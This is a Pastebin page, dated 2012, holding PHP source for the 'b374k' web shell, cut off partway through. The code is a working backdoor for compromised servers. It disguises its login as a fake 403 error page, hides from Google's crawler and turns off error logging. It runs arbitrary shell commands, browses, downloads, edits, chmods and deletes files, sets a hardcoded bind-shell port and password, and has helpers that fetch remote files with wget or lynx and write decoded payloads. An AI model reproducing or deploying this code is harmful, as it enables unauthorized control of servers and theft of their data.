Altenator_IWnet

PHP b374k Newbie3vilc063s - Last Version

Jul 17th, 2012
261
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 171.49 KB | None | 0 0
  1. <?php
  2.  
  3. /*********************************************************************************************************/
  4. $auth_pass = ""; //password crypted with md5, place it if you want your webshell have password..
  5. /*********************************************************************************************************/
  6. $color = "#00ff00";
  7. $default_action = 'FilesMan';
  8. @define('SELF_PATH', __FILE__);
  9.  
  10. /*********************************************************************************************************/
  11. # Avoid google's crawler
  12. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) { header('HTTP/1.0 404 Not Found'); exit; }
  13. /*********************************************************************************************************/
  14.  
  15. @session_start();
  16. @error_reporting(0);
  17. @ini_set('error_log',NULL);
  18. @ini_set('log_errors',0);
  19. @ini_set('max_execution_time',0);
  20. @set_time_limit(0);
  21. @set_magic_quotes_runtime(0);
  22. @define('VERSION', 'v.2012');
  23. @define('TITLE', ':: b374k Newbie3viLc063s 2012 ::');
  24.  
  25. /*********************************************************************************************************/
  26.  
  27. if( get_magic_quotes_gpc() )
  28. {
  29.     function stripslashes_array($array) { return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); }
  30.     $_POST = stripslashes_array($_POST);
  31. }
  32.  
  33. function logout()
  34. {
  35.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  36.     $page = $host='http://'.$_SERVER['SERVER_NAME'].'/'.$_SERVER['PHP_SELF'];
  37.         echo '<center><span class="b1">The System Is Going To Down For LogOut Administrator Pages!!</scan></center>';
  38.     ?>
  39.     <script>window.location.href = '<?php print $page; ?>';</script>
  40.     <?php
  41.     exit(0);
  42. }
  43.  
  44. function myshellexec($command) {
  45. if (!($p=popen("($command)2>&1","r"))) {
  46. return 126;
  47. }
  48. while (!feof($p)) {
  49. $line=fgets($p,1000);
  50. $out .= $line;
  51. }
  52. pclose($p);
  53. return $out;
  54. }
  55.  
  56. function parsesort($sort)
  57. {
  58.  $one = intval($sort);
  59.  $second = substr($sort,-1);
  60.  if ($second != "d") {$second = "a";}
  61.  return array($one,$second);
  62. }
  63.  
  64. $disablefunc = @ini_get("disable_functions");
  65.  
  66. function showdisablefunctions() {
  67.     if ($disablefunc=@ini_get("disable_functions")){ return "<span style='color:#00FF1E'>".$disablefunc."</span>"; }
  68.     else { return "<span style='color:#00FF1E'>NONE</span>"; }
  69.   }
  70.  
  71.   function ex($cfe) {
  72. $res = '';
  73. if (!empty($cfe)) {
  74. if(function_exists('exec')) {
  75. @exec($cfe,$res);
  76. $res = join("\n",$res);
  77. } elseif(function_exists('shell_exec')) {
  78. $res = @shell_exec($cfe);
  79. } elseif(function_exists('system')) {
  80. @ob_start();
  81. @system($cfe);
  82. $res = @ob_get_contents();
  83. @ob_end_clean();
  84. } elseif(function_exists('passthru')) {
  85. @ob_start();
  86. @passthru($cfe);
  87. $res = @ob_get_contents();
  88. @ob_end_clean();
  89. } elseif(@is_resource($f = @popen($cfe,"r"))) {
  90. $res = "";
  91. while(!@feof($f)) { $res .= @fread($f,1024); }
  92. @pclose($f);
  93. } else { $res = "Ex() Disabled!"; }
  94. }
  95. return $res;
  96. }
  97.  
  98.  
  99. function showstat($stat) {
  100. if ($stat=="on") { return "<b><font style='color:#00FF00'>ON</font></b>"; }
  101. else { return "<b><font style='color:#DD4736'>OFF</font></b>"; }
  102. }
  103. function testperl() {
  104. if (ex('perl -h')) { return showstat("on"); }
  105. else { return showstat("off"); }
  106. }
  107. function testfetch() {
  108. if(ex('fetch --help')) { return showstat("on"); }
  109. else { return showstat("off"); }
  110. }
  111. function testwget() {
  112. if (ex('wget --help')) { return showstat("on"); }
  113. else { return showstat("off"); }
  114. }
  115. function testoracle() {
  116. if (function_exists('ocilogon')) { return showstat("on"); }
  117. else { return showstat("off"); }
  118. }
  119. function testpostgresql() {
  120. if (function_exists('pg_connect')) { return showstat("on"); }
  121. else { return showstat("off"); }
  122. }
  123. function testmssql() {
  124. if (function_exists('mssql_connect')) { return showstat("on"); }
  125. else { return showstat("off"); }
  126. }
  127. function testcurl() {
  128. if (function_exists('curl_version')) { return showstat("on"); }
  129. else { return showstat("off"); }
  130. }
  131. function testmysql() {
  132. if (function_exists('mysql_connect')) { return showstat("on"); }
  133. else { return showstat("off"); }
  134. }
  135.  
  136. $quotes = get_magic_quotes_gpc();
  137. if ($quotes == "1" or $quotes == "on")
  138. {
  139. $quot = "<font style='color:red'>ON</font>";
  140. }
  141. else
  142. {
  143. $quot = "<font style='color:green'>OFF</font>";
  144. }
  145.  
  146. function printLogin()
  147. {
  148.     ?>
  149. <html>
  150.     <head>
  151.     <style> input { margin:0;background-color:#fff;border:1px solid #fff; } </style>
  152.     </head>
  153.         <title>
  154.         403 Forbidden
  155.         </title>
  156.         <body>
  157.     <h1>Forbidden</h1>
  158.     <p>You don't have permission to access this file on this server <?=$_SERVER['HTTP_HOST']?>.</p>
  159.     <hr>
  160.     <form method=post>
  161.     <address>Apache/2.2.8 at <?=$_SERVER['HTTP_HOST']?> Port 80<center><input type=password name=x><input type=submit value=''></center></address>
  162.     </form>
  163.     </body>
  164. </html>
  165.     <?php
  166.     exit;
  167. }
  168.  
  169. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  170.     {
  171.     if( empty( $auth_pass ) || ( isset( $_POST['x'] ) && ( md5($_POST['x']) == $auth_pass ) ) )
  172.         { $_SESSION[md5($_SERVER['HTTP_HOST'])] = true; }
  173.     else
  174.         { printLogin(); }
  175.     }
  176.  
  177. if(isset($_GET['dl']) && ($_GET['dl'] != ""))
  178.     {
  179.     $file   = $_GET['dl'];
  180.     $filez  = @file_get_contents($file);
  181.     header("Content-type: application/octet-stream");
  182.     header("Content-length: ".strlen($filez));
  183.     header("Content-disposition: attachment;
  184.     filename=\"".basename($file)."\";");
  185.     echo $filez;
  186.     exit;
  187.     }
  188.  
  189. elseif(isset($_GET['dlgzip']) && ($_GET['dlgzip'] != ""))
  190.     {
  191.     $file = $_GET['dlgzip'];
  192.     $filez = gzencode(@file_get_contents($file));
  193.     header("Content-Type:application/x-gzip\n");
  194.     header("Content-length: ".strlen($filez));
  195.     header("Content-disposition: attachment; filename=\"".basename($file).".gz\";");
  196.     echo $filez; exit;
  197.     }
  198.  
  199. if(isset($_GET['img']))
  200.     {
  201.     @ob_clean();
  202.     $d = magicboom($_GET['y']);
  203.     $f = $_GET['img'];
  204.     $inf = @getimagesize($d.$f);
  205.     $ext = explode($f,".");
  206.     $ext = $ext[count($ext)-1];
  207.     @header("Content-type: ".$inf["mime"]);
  208.     @header("Cache-control: public");
  209.     @header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
  210.     @header("Cache-control: max-age=".(60*60*24*7));
  211.     @readfile($d.$f);
  212.     exit;
  213.     }
  214. $ver = VERSION;
  215.  
  216. $DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
  217.  
  218. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") $safemode = TRUE;
  219. else $safemode  = FALSE;
  220. $system     = @php_uname();
  221.  
  222. if(strtolower(substr($system,0,3)) == "win") {
  223.     $win = TRUE;
  224.     } else {
  225.     $win    = FALSE;
  226. }
  227.  
  228. if(isset($_GET['y']))
  229.     { if(@is_dir($_GET['view'])){ $pwd = $_GET['view']; @chdir($pwd); } else{ $pwd = $_GET['y']; @chdir($pwd); } }
  230.  
  231. if(!$win)
  232.     { if(!$user = rapih(exe("whoami"))) $user = ""; if(!$id = rapih(exe("id"))) $id = ""; $prompt = $user." \$ "; $pwd = @getcwd().DIRECTORY_SEPARATOR; }
  233. else
  234.     {
  235.     $user   = @get_current_user();
  236.     $id     = $user;
  237.     $prompt = $user." &gt;";
  238.     $pwd    = realpath(".")."\\";
  239.     $v  = explode("\\",$d);
  240.     $v  = $v[0];
  241.     foreach (range("A","Z") as $letter)
  242.         {
  243.         $bool = @is_dir($letter.":\\");
  244.         if ($bool)
  245.             {
  246.             $letters    .= "<a href=\"?y=".$letter.":\\\">[ ";
  247.             if ($letter.":" != $v) {$letters .= $letter;}
  248.             else {$letters  .= "<span class=\"gaya\">".$letter."</span>";}
  249.             $letters    .= " ]</a> ";
  250.             }
  251.         }
  252.     }
  253.  
  254. if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
  255. else $posix = FALSE;
  256.  
  257.  
  258.         $bytes = disk_free_space(".");
  259.         $si_prefix = array( 'B', 'KB', 'MB', 'GB', 'TB', 'EB', 'ZB', 'YB' );
  260.         $base = 1024;
  261.         $class = min((int)log($bytes , $base) , count($si_prefix) - 1);
  262.         $totalspace_bytes = disk_total_space(".");
  263.         $totalspace_si_prefixs = array( 'B', 'KB', 'MB', 'GB', 'TB', 'EB', 'ZB', 'YB' );
  264.         $totalspace_bases = 1024;
  265.         $totalspace_class = min((int)log($totalspace_bytes , $totalspace_bases) , count($totalspace_si_prefixs) - 1);
  266.         $totalspace_show = sprintf('%1.2f' , $totalspace_bytes / pow($totalspace_bases,$totalspace_class)) . ' ' . $totalspace_si_prefixs[$totalspace_class] . '';
  267.         $freespace_show = sprintf('%1.2f' , $bytes / pow($base,$class)) . ' ' . $si_prefix[$class] . '';
  268.     $server_ip  = @gethostbyname($_SERVER["HTTP_HOST"]);
  269.     $my_ip      = $_SERVER['REMOTE_ADDR'];
  270.     $bindport   = "55555";
  271.     $bindport_pass  = "Newbie3viLc063s";
  272.     $pwds       = explode(DIRECTORY_SEPARATOR,$pwd);
  273.     $pwdurl     = "";
  274.     for($i = 0 ; $i < sizeof($pwds)-1 ; $i++)
  275.         {
  276.         $pathz  = "";
  277.         for($j  = 0 ; $j <= $i ; $j++)
  278.             {
  279.             $pathz .= $pwds[$j].DIRECTORY_SEPARATOR;
  280.             }
  281.         $pwdurl .= "<a href=\"?y=".$pathz."\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>";
  282.         }
  283.  
  284.     if(isset($_POST['rename'])){
  285.         $old = $_POST['oldname'];
  286.         $new = $_POST['newname'];
  287.         @rename($pwd.$old,$pwd.$new);
  288.         $file = $pwd.$new;
  289.         }
  290.     if(isset($_POST['chmod'])){
  291.         $name = $_POST['name'];
  292.         $value = $_POST['newvalue'];
  293.         if (strlen($value)==3){
  294.         $value = 0 . "" . $value;
  295.         }
  296.         @chmod($pwd.$name,octdec($value));
  297.         $file = $pwd.$name;
  298.         }
  299.     if(isset($_POST['chmod_folder'])){
  300.         $name = $_POST['name'];
  301.         $value = $_POST['newvalue'];
  302.         if (strlen($value)==3){
  303.         $value = 0 . "" . $value;
  304.         }
  305.         @chmod($pwd.$name,octdec($value));
  306.         $file = $pwd.$name;
  307.         }
  308.     $buff = $DISP_SERVER_SOFTWARE."<br />";
  309.     $buff .= '<font style="color:#F58F78">'.$system.'</font><br />';
  310.     if($id != "") $buff .= $id."<br />";
  311.     $buff .= "Server IP : "."<span style='color:#FF8800'>$server_ip</span>"."<font> | </font>"."Your IP : "."<span style='color:#FF0000'>$my_ip</span>"."<br />";
  312.         $buff .= "Total HDD Space : "."<span style='color:#00FF1E'>$totalspace_show</span>"."<font> | </font>"."Free HDD Space : "."<span style='color:#00FF1E'>$freespace_show</span>"."<br />";
  313.         $buff .=  "Magic Quotes:$quot"."<br>";
  314.         $buff .= "Disabled Functions: ".showdisablefunctions()."<br>";
  315.         $buff .= "MySQL: ".testmysql()." MSSQL: ".testmssql()." Oracle: ".testoracle()." MSSQL: ".testmssql()." PostgreSQL: ".testpostgresql()." cURL: ".testcurl()." WGet: ".testwget()." Fetch: ".testfetch()." Perl: ".testperl()."<br>";
  316.     if($safemode) $buff .= "safemode <span class=\"gaya\">ON</span><br />";
  317.     else $buff .= "safemode <span class=\"gaya\">OFF<span><br />";
  318.     $buff .= $letters."&nbsp;&gt;&nbsp;".$pwdurl;
  319.  
  320.     function rapih($text){ return trim(str_replace("<br />","",$text)); }
  321.  
  322.     function magicboom($text){ if (!get_magic_quotes_gpc()) { return $text; } return stripslashes($text); }
  323.  
  324.     function showdir($pwd,$prompt)
  325.     {
  326.         $fname = array();
  327.         $dname = array();
  328.         if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
  329.         else $posix = FALSE;
  330.         $user = "????:????";
  331.         if($dh = opendir($pwd))
  332.             {
  333.             while($file = readdir($dh))
  334.                 {
  335.                 if(is_dir($file))
  336.                     { $dname[] = $file; }
  337.                 elseif(is_file($file))
  338.                     { $fname[] = $file; }
  339.                 }
  340.             closedir($dh);
  341.             }
  342.         sort($fname);
  343.         sort($dname);
  344.         $path = @explode(DIRECTORY_SEPARATOR,$pwd);
  345.         $tree = @sizeof($path);
  346.         $parent = "";
  347.         $buff = "<form action=\"?y=".$pwd."&amp;x=shell\" method=\"post\" style=\"margin:8px 0 0 0;\">
  348.                 <table class=\"cmdbox\" style=\"width:50%;\">
  349.                 <tr>
  350.                 <td>CMD@$prompt</td>
  351.                 <td><input onMouseOver=\"this.focus();\" id=\"cmd\" class=\"inputz\" type=\"text\" name=\"cmd\" style=\"width:400px;\" value=\"\" />
  352.                 <input class=\"inputzbut\" type=\"submit\" value=\"Execute !\" name=\"submitcmd\" style=\"width:80px;\" /></td>
  353.                 </tr>
  354.             </form>
  355.             <form action=\"?\" method=\"get\" style=\"margin:8px 0 0 0;\">
  356.                 <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  357.                 <tr>
  358.                 <td>view file/folder</td>
  359.                 <td><input onMouseOver=\"this.focus();\" id=\"goto\" class=\"inputz\" type=\"text\" name=\"view\" style=\"width:400px;\" value=\"".$pwd."\" />
  360.                 <input class=\"inputzbut\" type=\"submit\" value=\"Enter !\" name=\"submitcmd\" style=\"width:80px;\" /></td>
  361.                 </tr>
  362.             </form>
  363.             </table>
  364.             <table class=\"explore\">
  365.                 <tr>
  366.                 <th>name</th>
  367.                 <th style=\"width:80px;\">size</th>
  368.                 <th style=\"width:210px;\">owner:group</th>
  369.                 <th style=\"width:80px;\">perms</th>
  370.                 <th style=\"width:110px;\">modified</th>
  371.                 <th style=\"width:190px;\">actions</th>
  372.                 </tr> ";
  373.  
  374.         if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR;
  375.         else $parent = $pwd;
  376.         foreach($dname as $folder)
  377.             {
  378.             if($folder == ".")
  379.                 {
  380.                 if(!$win && $posix)
  381.                     {
  382.                     $name=@posix_getpwuid(@fileowner($folder));
  383.                     $group=@posix_getgrgid(@filegroup($folder));
  384.                     $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  385.                     }
  386.                 else { $owner = $user; }
  387.                 $buff .= "<tr>
  388.                         <td><a href=\"?y=".$pwd."\">$folder</a></td>
  389.                         <td>-</td>
  390.                         <td style=\"text-align:center;\">".$owner."</td>
  391.                         <td><center>".get_perms($pwd)."</center></td>
  392.                         <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($pwd))."</td>
  393.                         <td><span id=\"titik1\">
  394.                             <a href=\"?y=$pwd&amp;edit=".$pwd."newfile.php\">newfile</a>
  395.                             | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a>
  396.                             </span>
  397.                         <form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  398.                             <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  399.                             <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
  400.                             <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go\" />
  401.                         </form>
  402.                         </td>
  403.                     </tr> ";
  404.                 }
  405.             elseif($folder == "..")
  406.                 {
  407.                 if(!$win && $posix)
  408.                     {
  409.                     $name=@posix_getpwuid(@fileowner($folder));
  410.                     $group=@posix_getgrgid(@filegroup($folder));
  411.                     $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  412.                     }
  413.                 else    { $owner = $user; }
  414.                 $buff .= "<tr>
  415.                         <td>
  416.                         <a href=\"?y=".$parent."\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAAadEVYdFNvZnR3YXJlAFBhaW50Lk5FVCB2My41LjEwMPRyoQAAAgZJREFUOE9jYKAF4I7ez6CVfVQvpOOiGcnm8yUdYVRvuWalvvjNTemqi01cUfuJN4Mv/QSjRsdNG81VH6/Lb/vzT6juWhtP/CFGokwQyD3DqNpxy1Zj5YdrCjv+/Zfb+uefSNPNNt6044QNECy5wKjUesNadcHr63Jrv/2XAWL5NV//W819sk9/6sMcMJ4GwXpTHiboTLpvpzXhnoxx/x0WBsHKywzyjdfNlKY9uSU1781/SSQsMef1f4nZr1DxrJcvJWe+XC45/XmIQv8DfgbBqqvScl1374r1Pfwv2gvDD4BsGIaIgeTF+h/9F5vw+I3YxMfrxCY+iQLyBRlEaq+JSjTdWCfRfPOPUMON/zAsDGSLNt38L4aGRZtvvhFrvrVOtOV2FBALMgjVXGMUb7qpIdNxZ51U193fIu13/4OwKBDrdj74bDbzwRNkbDrj/mXj6fdnGk6976/Xd58fHEPA0GaS7LirLdf3YI10/8NfolDviLU8WAQ01E66664tHHffNZftuasq33NPWLXjPgs8ikU77jFL9T3UkZ38ZI3U1Ge/xKc8+wf0Z5tI5z1GoIvQMQNQjEG07S5qEhHve8QsNfmpjvSM52ukZ736JT7pRRvQIMLpANkYoAZm6ZkvtDVmvVktWPK6SmL6K9IMABkmM/slk+qMN7Iy/W/kxKe/ISolk60IAJfcKhfb3kZPAAAAAElFTkSuQmCC' />  $folder</a></td>
  417.                         <td>-</td>
  418.                         <td style=\"text-align:center;\">".$owner."</td>
  419.                         <td><center>".get_perms($parent)."</center></td>
  420.                         <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($parent))."</td>
  421.                         <td><span id=\"titik2\">
  422.                             <a href=\"?y=$pwd&amp;edit=".$parent."newfile.php\">newfile</a>
  423.                             | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a>
  424.                             </span>
  425.                         <form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  426.                             <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  427.                             <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
  428.                             <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go\" />
  429.                         </form>
  430.                         </td>
  431.                     </tr>";
  432.                 }
  433.             else
  434.                 {
  435.                 if(!$win && $posix)
  436.                     {
  437.                     $name=@posix_getpwuid(@fileowner($folder));
  438.                     $group=@posix_getgrgid(@filegroup($folder));
  439.                     $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  440.                     }
  441.                 else { $owner = $user; }
  442.                 $buff .= "<tr>
  443.                         <td>
  444.                         <a id=\"".clearspace($folder)."_link\" href=\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABGdBTUEAALGPC/xhBQAAAAlwSFlzAAAOwgAADsIBFShKgAAAABp0RVh0U29mdHdhcmUAUGFpbnQuTkVUIHYzLjUuMTAw9HKhAAACkUlEQVQ4T8WT2UvUURzFz2NRT5pab9ZDYZNMLjNq6rg1Fqhl5cw8qA+2kJmBgxKUhVpW4y6FZblkaRROpkQLITKG1ERhC5JMuaVmzuQWBD3e27nN0D/QQz/48P1+7znne+/LD/jvn14XtUYXqU+O0kebY2NiLfFxBkuiIcmSnJRiMe5MtexK3W02phjNSYnJZkN8gikmeoeJGRMzRr1OvxZbQzTBZCBUE+oJD4vwcJEnNibOY4hL8HCRJzEh6U/PMzc1d/j2CPc2TaibmSFNiGYT7hT7nbyU579y4dA6WXUsQNacCJR1RYGyoThINpZs8LFe1luD/mi2/ABZedBf2vL8fnSV+JdhohZPJ+sgv16H9NyGXOyGXH4AudLLetfLSh8rZ6Upj/JOMTNRAwfGa9A3Wetb0OlbQPPSffZdXpbZ/11Aj1qgMuPVeIYxG7rGbZAzTZDzHZDfeeOindxjf5M3tkMuMLTEswVqyjNzleEqSGZ74KrEZVcFn1QPMcfN7g4IPlPMN0N8a/IyR9xthJryTDVAuM5Bus6jBaPlKB85xW0XIaYb+bxrkLNXIL5UQxJVxRRfOM0LZnmz8iivyoyWwYaRUhS8LYL4WArxuRJiooq1AuLTGR9nOZd5z5Q2Ro/yqszIaVgxbEXmy8OQbwoh3pdAvrNCvD4KMXwccriAVVFIPR/iQzGhR3lfMMOsCY4chPVb8JPIwVzI5zmQA2aI/izO7AezOVNzZEMM5VGnR3nJL0cuInErHcH2DHTb0+DszcSrh1lwPjb7sMD5hKj5kQlOpfXRY0+HszsDPZ0Z2IjcMKyuTsXm5jRob+yBtnUftG0HSBa07QqTt7bu92ote6FtToeWmS1HdFj1zz/zb9ZqmlZ866Y6AAAAAElFTkSuQmCC' />  [ $folder ]</a>
  445.                         <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  446.                             <input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
  447.                             <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" />
  448.                             <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  449.                             <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
  450.                             onclick=\"tukar('".clearspace($folder)."_form','".clearspace($folder)."_link');\" />
  451.                         </form>
  452.                         </td>
  453.                         <td>DIR</td>
  454.                         <td style=\"text-align:center;\">".$owner."</td>
  455.                         <td><center>
  456.                         <a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\">".get_perms($pwd.$folder)."</a>
  457.                             <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form3\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  458.                             <input type=\"hidden\" name=\"name\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
  459.                             <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($pwd.$folder)), -4)."\" />
  460.                             <input class=\"inputzbut\" type=\"submit\" name=\"chmod_folder\" value=\"chmod\" />
  461.                             <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
  462.                             onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\" />
  463.                     </form>
  464.                     </center></td>
  465.                         <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($folder))."</td>
  466.                         <td><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form');\">rename</a>
  467.                         | <a href=\"?y=$pwd&amp;fdelete=".$pwd.$folder."\">delete</a>
  468.                         </td>
  469.                         </tr>";
  470.                 }
  471.             }
  472.         foreach($fname as $file)
  473.             {
  474.             $full = $pwd.$file;
  475.             if(!$win && $posix)
  476.                 {  
  477.                 $name=@posix_getpwuid(@fileowner($file));
  478.                 $group=@posix_getgrgid(@filegroup($file));
  479.                 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  480.                 }
  481.             else { $owner = $user; }
  482.             $buff .= "<tr>
  483.                     <td>
  484.                     <a id=\"".clearspace($file)."_link\" href=\"?y=$pwd&amp;view=$full\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAAadEVYdFNvZnR3YXJlAFBhaW50Lk5FVCB2My41LjEwMPRyoQAAAXVJREFUOE+NkjtPwlAYhv0DLEZJSDQawQCTcYD/YWIkzqx0cHT1D7C4nMRFSdOWi4uzm9FFXcRBI3KxQGlLoYCAILyekhiRw6UneZKmeb8n79eepaW/43e5XFGfz0csvF4v8Xi2yfrGJllecRIa2xnLMo+OcDis6kYNulEfUdEMZD/KuH1IQ7y6RiQS0eZJAolkig6U/pHJy0i/vOPm/gnlikYl3ExJMJm6hFxWGQpFhUqyKJQqyNFGHMfptMnu5A5UkBrVZqkiLyt4zcrI5It4y8nY2w9ZkrVxSdBaoVozZ6LqtVGDu8dnHB2fgA4HGYHZaGE2TRj1BoqKhlNyxgriiSRan+2FmM0WYrzACiQq6HS7C2l3uhDjiSkC+vKr17OFNE0gSnH0+9+2sLLMRxRECYPBwBaCOEXACyKGw6EteEFiGgTOYzzsnguapSsExu+B4yB0qJYUlf5rcy5WxsrSYcfkdfavOp3RLbebzMPK0EH/7/APv59j7X+gJNIAAAAASUVORK5CYII%3D' />  $file</a>
  485.                     <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  486.                         <input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
  487.                         <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" />
  488.                         <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  489.                         <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
  490.                             onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form');\" />
  491.                     </form>
  492.                     </td>
  493.                     <td>".ukuran($full)."</td>
  494.                     <td style=\"text-align:center;\">".$owner."</td>
  495.                     <td><center>
  496.                     <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\">".get_perms($full)."</a>
  497.                     <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form2\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  498.                         <input type=\"hidden\" name=\"name\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
  499.                         <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($full)), -4)."\" />
  500.                         <input class=\"inputzbut\" type=\"submit\" name=\"chmod\" value=\"chmod\" />
  501.                         <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
  502.                             onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\" />
  503.                     </form></center></td>
  504.                     <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($full))."</td>
  505.                     <td>
  506.                     <a href=\"?y=$pwd&amp;edit=$full\">edit</a>
  507.                     | <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\">rename</a>
  508.                     | <a href=\"?y=$pwd&amp;delete=$full\">delete</a>
  509.                     | <a href=\"?y=$pwd&amp;dl=$full\">download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$full\">gz</a>)
  510.                     </td>
  511.                 </tr>";
  512.             }
  513.         $buff .= "</table>"; return $buff;
  514.     }
  515.  
  516.     function ukuran($file)
  517.     {
  518.         if($size = @filesize($file))
  519.             {  
  520.             if($size <= 1024) return $size;
  521.             else
  522.                 {
  523.                 if($size <= 1024*1024)
  524.                     { $size = @round($size / 1024,2);; return "$size kb"; }
  525.                 else { $size = @round($size / 1024 / 1024,2); return "$size mb"; }
  526.                 }
  527.             }
  528.         else return "???";
  529.     }
  530.  
  531.     function exe($cmd)
  532.     {
  533.         if(function_exists('system'))
  534.             {
  535.             @ob_start();
  536.             @system($cmd);
  537.             $buff = @ob_get_contents();
  538.             @ob_end_clean();
  539.             return $buff;
  540.             }
  541.         elseif(function_exists('exec'))
  542.             {
  543.             @exec($cmd,$results);
  544.             $buff = "";
  545.             foreach($results as $result)
  546.                 { $buff .= $result; }
  547.             return $buff;
  548.             }
  549.         elseif(function_exists('passthru'))
  550.             {
  551.             @ob_start();
  552.             @passthru($cmd);
  553.             $buff = @ob_get_contents();
  554.             @ob_end_clean();
  555.             return $buff;
  556.             }
  557.         elseif(function_exists('shell_exec'))
  558.             {
  559.             $buff = @shell_exec($cmd);
  560.             return $buff;
  561.             }
  562.     }
  563.  
  564.     function tulis($file,$text)
  565.     {
  566.     $textz = gzinflate(base64_decode($text));
  567.     if($filez = @fopen($file,"w"))
  568.         {
  569.         @fputs($filez,$textz);
  570.         @fclose($file);
  571.         }
  572.     }
  573.    
  574.     function tulis_2($file,$text)
  575.     {
  576.     $textz = base64_decode($text);
  577.     if($filez = @fopen($file,"w"))
  578.         {
  579.         @fputs($filez,$textz);
  580.         @fclose($file);
  581.         }
  582.     }
  583.  
  584.     function ambil($link,$file)
  585.     {
  586.     if($fp = @fopen($link,"r"))
  587.         {
  588.         while(!feof($fp))
  589.             {
  590.             $cont.= @fread($fp,1024);
  591.             }
  592.         @fclose($fp);
  593.         $fp2 = @fopen($file,"w");
  594.         @fwrite($fp2,$cont);
  595.         @fclose($fp2);
  596.         }
  597.     }
  598.  
  599.     function which($pr)
  600.     {
  601.     $path = exe("which $pr");
  602.     if(!empty($path))
  603.         { return trim($path); }
  604.     else { return trim($pr); }
  605.     }
  606.  
  607.     function download($cmd,$url)
  608.     {
  609.     $namafile = basename($url);
  610.     switch($cmd)
  611.         {
  612.         case 'wwget': exe(which('wget')." ".$url." -O ".$namafile); break;
  613.         case 'wlynx': exe(which('lynx')." -source ".$url." > ".$namafile); break;
  614.         case 'wfread' : ambil($wurl,$namafile);break;
